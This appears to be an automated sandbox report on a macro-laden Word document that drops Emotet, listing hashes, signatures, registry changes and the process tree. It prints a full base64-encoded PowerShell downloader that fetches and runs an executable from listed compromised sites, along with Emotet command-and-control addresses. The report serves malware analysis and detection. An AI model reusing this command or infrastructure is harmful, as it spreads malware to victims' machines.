Analysis
-
max time kernel
153s -
max time network
149s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
16-09-2020 12:43
Static task
static1
Behavioral task
behavioral1
Sample
JVDT20_09.doc
Resource
win7v200722
General
-
Target
JVDT20_09.doc
-
Size
161KB
-
MD5
c8db50682c9c51a0a5b220aca08a8b5f
-
SHA1
f0e2afb8a556bb000e169e24e84c3af9942429fe
-
SHA256
127c406b36e40a2277c416de6a955130dba4cb23be857da9a3987fb98a170d32
-
SHA512
cece058757e669d26a73ad58d9c4f5c02ae7118cf9c5fc78e3b92a4bc8b268c500867e7b3f131432f07c422fc26976d17ea8d4f98bd4a783cfe19e88e97fa3ee
Malware Config
Extracted
https://templatejson.com/awrrn/Kw10uo/
https://hosting.mybestheme.com/aikjj0q/8/
https://tastes2plate.com/wp-content/uploads/6/
http://madeirawildlife.com/wp-admin/zuWZW/
http://senyumdesa.org/wp-admin/aC4/
https://ibuyoldwebsites.com/modules/QVtEr7/
http://blog.zunapro.com/wp-admin/js/widgets/EH4agl/
Extracted
emotet
74.219.172.26:80
134.209.36.254:8080
104.156.59.7:8080
120.138.30.150:8080
194.187.133.160:443
104.236.246.93:8080
74.208.45.104:8080
78.187.156.31:80
187.161.206.24:80
94.23.216.33:80
172.91.208.86:80
91.211.88.52:7080
50.91.114.38:80
200.123.150.89:443
121.124.124.40:7080
62.75.141.82:80
5.196.74.210:8080
24.137.76.62:80
85.105.205.77:8080
139.130.242.43:80
82.225.49.121:80
110.145.77.103:80
195.251.213.56:80
46.105.131.79:8080
87.106.136.232:8080
75.139.38.211:80
124.41.215.226:80
203.153.216.189:7080
162.241.242.173:8080
219.74.18.66:443
174.45.13.118:80
68.188.112.97:80
200.114.213.233:8080
213.196.135.145:80
61.92.17.12:80
61.19.246.238:443
219.75.128.166:80
120.150.60.189:80
123.176.25.234:80
1.221.254.82:80
137.119.36.33:80
94.23.237.171:443
74.120.55.163:80
62.30.7.67:443
104.131.11.150:443
139.59.67.118:443
209.141.54.221:8080
79.137.83.50:443
84.39.182.7:80
97.82.79.83:80
87.106.139.101:8080
94.1.108.190:443
37.187.72.193:8080
139.162.108.71:8080
93.147.212.206:80
74.134.41.124:80
103.86.49.11:8080
75.80.124.4:80
109.74.5.95:8080
153.232.188.106:80
168.235.67.138:7080
50.35.17.13:80
42.200.107.142:80
82.80.155.43:80
78.24.219.147:8080
24.43.99.75:80
107.5.122.110:80
156.155.166.221:80
83.169.36.251:8080
47.144.21.12:443
79.98.24.39:8080
181.169.34.190:80
139.59.60.244:8080
85.152.162.105:80
185.94.252.104:443
110.5.16.198:80
174.102.48.180:443
140.186.212.146:80
95.179.229.244:8080
104.32.141.43:80
169.239.182.217:8080
121.7.127.163:80
94.200.114.161:80
201.173.217.124:443
104.131.44.150:8080
137.59.187.107:8080
5.39.91.110:7080
203.117.253.142:80
157.245.99.39:8080
176.111.60.55:8080
95.213.236.64:8080
220.245.198.194:80
37.139.21.175:8080
89.216.122.92:80
139.99.158.11:443
24.179.13.119:80
188.219.31.12:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 1112 powershell.exe -
Emotet Payload 8 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/676-15-0x0000000000260000-0x0000000000272000-memory.dmp emotet behavioral1/memory/676-15-0x0000000000260000-0x0000000000272000-memory.dmp emotet behavioral1/memory/676-16-0x0000000000280000-0x0000000000290000-memory.dmp emotet behavioral1/memory/676-16-0x0000000000280000-0x0000000000290000-memory.dmp emotet behavioral1/memory/908-20-0x0000000000320000-0x0000000000332000-memory.dmp emotet behavioral1/memory/908-20-0x0000000000320000-0x0000000000332000-memory.dmp emotet behavioral1/memory/908-21-0x0000000000340000-0x0000000000350000-memory.dmp emotet behavioral1/memory/908-21-0x0000000000340000-0x0000000000350000-memory.dmp emotet -
Blacklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 5 1632 powershell.exe 7 1632 powershell.exe 9 1632 powershell.exe 11 1632 powershell.exe 13 1632 powershell.exe 15 1632 powershell.exe 17 1632 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
J_eilb.exeJavaScriptCollectionAgent.exepid process 676 J_eilb.exe 908 JavaScriptCollectionAgent.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exeJ_eilb.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe J_eilb.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1108 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exeJavaScriptCollectionAgent.exepid process 1632 powershell.exe 1632 powershell.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1632 powershell.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXEJ_eilb.exeJavaScriptCollectionAgent.exepid process 1108 WINWORD.EXE 1108 WINWORD.EXE 676 J_eilb.exe 676 J_eilb.exe 908 JavaScriptCollectionAgent.exe 908 JavaScriptCollectionAgent.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
powershell.exeJ_eilb.exedescription pid process target process PID 1632 wrote to memory of 676 1632 powershell.exe J_eilb.exe PID 1632 wrote to memory of 676 1632 powershell.exe J_eilb.exe PID 1632 wrote to memory of 676 1632 powershell.exe J_eilb.exe PID 1632 wrote to memory of 676 1632 powershell.exe J_eilb.exe PID 676 wrote to memory of 908 676 J_eilb.exe JavaScriptCollectionAgent.exe PID 676 wrote to memory of 908 676 J_eilb.exe JavaScriptCollectionAgent.exe PID 676 wrote to memory of 908 676 J_eilb.exe JavaScriptCollectionAgent.exe PID 676 wrote to memory of 908 676 J_eilb.exe JavaScriptCollectionAgent.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JVDT20_09.doc"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABJAHEAYQBqAG0AcAB5AD0AKAAoACcAVgAnACsAJwBiAHkAdgAnACkAKwAnAHgAJwArACcAagB6ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAZABJAGEAUgA4AGgANwBcAG8AZgBmADEARgBFAFkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAHUAYABSAGAASQB0AFkAYABwAFIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAsACAAdABsAHMAMQAnACsAJwAxACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEsAdwBwAHYANwBhAHoAIAA9ACAAKAAnAEoAJwArACcAXwBlACcAKwAoACcAaQBsACcAKwAnAGIAJwApACkAOwAkAEEAdAB4ADMAcQBlAGYAPQAoACcASAA5ACcAKwAnAGgAagAnACsAKAAnAHEAJwArACcAYQBxACcAKQApADsAJABGAHAAegBtAHYAagA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHEAJwArACgAJwBJACcAKwAnAEwARABpAGEAJwApACsAJwByADgAJwArACgAJwBoADcAJwArACcAcQAnACkAKwAoACcASQBMAE8AZgAnACsAJwBmACcAKwAnADEAZgBlACcAKwAnAHkAcQBJAEwAJwApACkALgAiAHIAYABFAFAAYABMAEEAYwBFACIAKAAoAFsAQwBoAEEAcgBdADEAMQAzACsAWwBDAGgAQQByAF0ANwAzACsAWwBDAGgAQQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEsAdwBwAHYANwBhAHoAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABTAHUAcAB4ADYAdQBrAD0AKAAoACcASABxACcAKwAnADgAbgBnACcAKwAnAF8AJwApACsAJwBwACcAKQA7ACQATgA1ADgAaQB5AGEAMgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAEwASQBFAE4AdAA7ACQAVgB6ADAAYgBnAGMANgA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AdABlACcAKQArACgAJwBtAHAAbABhAHQAJwArACcAZQAnACsAJwBqACcAKwAnAHMAbwBuAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYQB3AHIAcgAnACsAJwBuAC8ASwB3ADEAJwArACcAMAB1ACcAKwAnAG8AJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwAHMAOgAnACsAJwAvAC8AaAAnACkAKwAoACcAbwAnACsAJwBzAHQAaQBuAGcAJwApACsAKAAnAC4AbQB5ACcAKwAnAGIAJwApACsAJwBlACcAKwAnAHMAJwArACcAdAAnACsAKAAnAGgAJwArACcAZQBtACcAKQArACgAJwBlAC4AYwBvAG0AJwArACcALwBhAGkAJwArACcAawBqAGoAJwApACsAKAAnADAAJwArACcAcQAvADgALwAnACkAKwAnACoAJwArACcAaAB0ACcAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKQArACcALwB0ACcAKwAoACcAYQBzAHQAZQAnACsAJwBzACcAKQArACgAJwAyAHAAJwArACcAbABhAHQAZQAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAKAAnAG8AJwArACcAbgB0AGUAJwApACsAJwBuAHQAJwArACgAJwAvAHUAJwArACcAcAAnACkAKwAoACcAbABvACcAKwAnAGEAJwApACsAKAAnAGQAJwArACcAcwAvADYAJwArACcALwAqAGgAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBtACcAKwAoACcAYQBkACcAKwAnAGUAJwApACsAKAAnAGkAcgAnACsAJwBhACcAKQArACcAdwAnACsAKAAnAGkAJwArACcAbABkAGwAJwApACsAJwBpACcAKwAnAGYAJwArACcAZQAnACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZABtAGkAJwArACcAbgAvAHoAdQAnACkAKwAoACcAVwAnACsAJwBaAFcALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AcwAnACsAKAAnAGUAbgAnACsAJwB5ACcAKQArACcAdQAnACsAJwBtACcAKwAoACcAZABlAHMAYQAnACsAJwAuACcAKwAnAG8AJwApACsAJwByACcAKwAoACcAZwAvAHcAcAAnACsAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwAnACkAKwAoACcAYQAnACsAJwBDADQALwAqACcAKQArACgAJwBoACcAKwAnAHQAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvAGkAYgB1ACcAKwAnAHkAbwAnACkAKwAoACcAbABkACcAKwAnAHcAZQAnACkAKwAoACcAYgBzAGkAJwArACcAdABlAHMAJwApACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwBtAG8AZAAnACsAJwB1AGwAJwApACsAKAAnAGUAcwAvACcAKwAnAFEAJwApACsAKAAnAFYAJwArACcAdABFACcAKQArACcAcgAnACsAKAAnADcALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8ALwAnACsAJwBiAGwAJwApACsAKAAnAG8AZwAnACsAJwAuAHoAdQAnACsAJwBuAGEAcAByAG8ALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtACcAKwAnAGEAZAAnACsAKAAnAG0AJwArACcAaQBuAC8AJwApACsAJwBqAHMAJwArACgAJwAvACcAKwAnAHcAaQBkACcAKQArACgAJwBnAGUAJwArACcAdABzAC8ARQBIACcAKQArACgAJwA0AGEAJwArACcAZwBsACcAKQArACcALwAnACkALgAiAFMAYABwAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAA2AF8AMQAxAHgAaAA9ACgAKAAnAFMAagBuAHgAcQAnACsAJwBfACcAKQArACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABIAGMAZABqAHEAbAB0ACAAaQBuACAAJABWAHoAMABiAGcAYwA2ACkAewB0AHIAeQB7ACQATgA1ADgAaQB5AGEAMgAuACIAZABvAGAAdwBOAEwAYABvAEEARABGAGAASQBMAEUAIgAoACQASABjAGQAagBxAGwAdAAsACAAJABGAHAAegBtAHYAagA2ACkAOwAkAFgAaQBvAHoANwBwADEAPQAoACcARwAnACsAJwBoACcAKwAoACcAcQBhAGgAJwArACcAMwB3ACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEYAcAB6AG0AdgBqADYAKQAuACIAbABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADUANwA0ADcAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUALQBJACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKQAoACQARgBwAHoAbQB2AGoANgApADsAJABIAF8AdgBhADIAYgBjAD0AKAAoACcAWgAnACsAJwA5AHcAJwApACsAKAAnAGcAeQAnACsAJwBfAGwAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAcgAwAHYAMgBhADYAPQAoACgAJwBOACcAKwAnAHIAcwAnACkAKwAoACcAZwAnACsAJwBoAGoAOQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBlAGUAXwB6AGgAZwA9ACgAJwBJACcAKwAoACcAbQA5ACcAKwAnAHMAJwApACsAKAAnAGUAawAnACsAJwB2ACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\Diar8h7\Off1fey\J_eilb.exe"C:\Users\Admin\Diar8h7\Off1fey\J_eilb.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe"C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:908
-
-